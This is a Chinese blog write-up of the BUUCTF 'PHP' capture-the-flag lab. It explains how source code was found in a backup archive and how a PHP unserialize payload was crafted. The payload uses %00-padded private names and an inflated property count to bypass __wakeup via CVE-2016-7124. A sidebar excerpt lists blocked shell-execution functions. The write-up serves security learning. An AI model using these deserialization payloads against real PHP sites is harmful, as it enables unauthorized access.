BUUCTF-PHP

最新推荐文章于 2024-05-02 14:26:53 发布
最新推荐文章于 2024-05-02 14:26:53 发布
阅读量955 收藏 6
点赞数 1
分类专栏: BUUCTF-wp 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37450949/article/details/120165405
版权

启动靶机,打开网页发现有提示说存在备份文件
请添加图片描述
直接使用 www.zip 下载备份源码请添加图片描述
请添加图片描述
在 index.php 中发现反序列化函数
此文件包含了 class.php 所以继续前往该文件进行审查

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

存在 echo $flag,于是再次查看代码

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    
    //创建对象时触发
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    
    //使用 unserialize 时触发
    function __wakeup(){
        $this->username = 'guest';
    }
    
    //对象销毁时触发
    //如果 password = 100, username = admin,在执行 __destruct() 的时候可以获得flag
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

可知我们需要通过反序列化来执行 destruct 函数,如果 password=100,username=admin,就可以得到flag
于是自己构造序列化

<?php

class Name
{
    private $username;
    private $password;

    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin',100);
var_dump(serialize($a));

?>

请添加图片描述

构造payload:

./?select=O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

但是出现了问题
请添加图片描述
发现问题出在使用 unserialize() 时触发的 __wakeup
通过查找资料发现存在绕过方法(CVE-2016-7124)当成员属性数目大于实际数目时可绕过wakeup
但是在直接修改成员属性数目后并无效果,后查询资料获得解决办法:

  • 方法一:用序列化加%00
    在序列化时,Public属性序列化后格式:成员名,Private属性序列化后格式:%00类名%00成员名,Protected属性序列化后的格式:%00*%00成员名。
    但是在对序列化后的数据直接进行复制时会丢失 %00 所以我们对其手动补全,并更改成员属性数目使其大于实际数目
    payload:./?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
    请添加图片描述

  • 方法二:直接在序列化时输出url编码后的字符串

<?php

class Name
{
    private $username;
    private $password;

    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin',100);
var_dump(serialize($a));
var_dump(urlencode(serialize($a)));

?>

请添加图片描述
并修改成员属性数目大于实际数目
payload:./?select=O%3A4%3A"Name"%3A3%3A%7Bs%3A14%3A"%00Name%00username"%3Bs%3A5%3A"admin"%3Bs%3A14%3A"%00Name%00password"%3Bi%3A100%3B%7D
也能获取flag

不想弹solo
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几次真的心态崩溃。写一个记录贴。kali真的是个好东西。。 解决了的问题: kali忘了密码怎么办 kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
BUUCTF——phpweb
weixin_45864041的博客
04-17 586
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
BUUCTF-[极客大挑战 2019]PHP1
Monica的博客
09-27 3610
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
buuctf-PHP
xixihahawuwu的博客
11-23 1196
看题目说备份网站,扫一下看看 把文件下载下来 一些源码 这里的unserialize涉及到一个反序列化 接着看class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ .
buuctf php
ANYOUZHEN的博客
05-24 257
根据提示,网站一个有备份,我们打开御剑,直接扫它,发现了/www.zip,打开 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->userna..
BUUCTF PHP
m0_73867210的博客
02-03 240
习惯性的查看源码 但没发现什么,于是搜其他大佬的文章得知这个题目重点在网站备份,我没有下载扫描网站的软件,看其他博主扫到的结果是有一个压缩文件的构造playload,得到压缩包 压缩得到四个代码文件 依次查看发现只有class.php与flag有关 分析代码,因为基础有欠缺,好几个函数不知道什么意思,看到别的博主说是PHP反序列化,咱也没听过,就复制了playload得到了flag 参考这位博主的文章也是学到了很多,比如网络备份文件,PHP反序列化,以及P
BUUCTF--[极客大挑战 2019]PHP
qq_46263951的博客
09-04 269
学了几天的PHP反序列化漏洞,找一个比较简单的题练练手 进入后给出提示网站存在备份,尝试几种常见的备份目录或者也可以直接扫描目录 访问/www.zip时弹出下载框,得到源代码,flag.php文件只有被调用执行才可获得到flag 在index.php中发现这样一段代码 <?php include 'class.php'; $select = $_GET['select']; //可控参数 $res=unserialize(@$select); //反序列化 ?> ...
BUUCTF-web PHP[极客大挑战] wp
想喝奶茶的胖大海
02-26 1017
检查 有一只超级可爱的猫猫哦,可以跟你玩毛球球 然后提示说有备份,可以扫一下 思路 跟进得到压缩包,解压得到3个文件 在index.php得到关键代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 由unserialize(...
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): #print s
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
【Web】CTFSHOW 中期测评刷题记录(1)
最新发布
uuzeray的博客
05-02 1073
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
supervisor 简单理解
qq_42857358的博客
04-28 240
test.ini文件内容。
2024 XYCTF Web 方向 wp 全解
qq_39947980的博客
04-27 1067
XYCTF 2024 Web 方向全解
桌面运维岗面试三十问
一坨小橙子的博客
04-28 739
桌面运维岗面试问题及答案汇总
buuctf 极客大挑战2019php
08-24
buuctf 极客大挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客大挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不想弹solo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值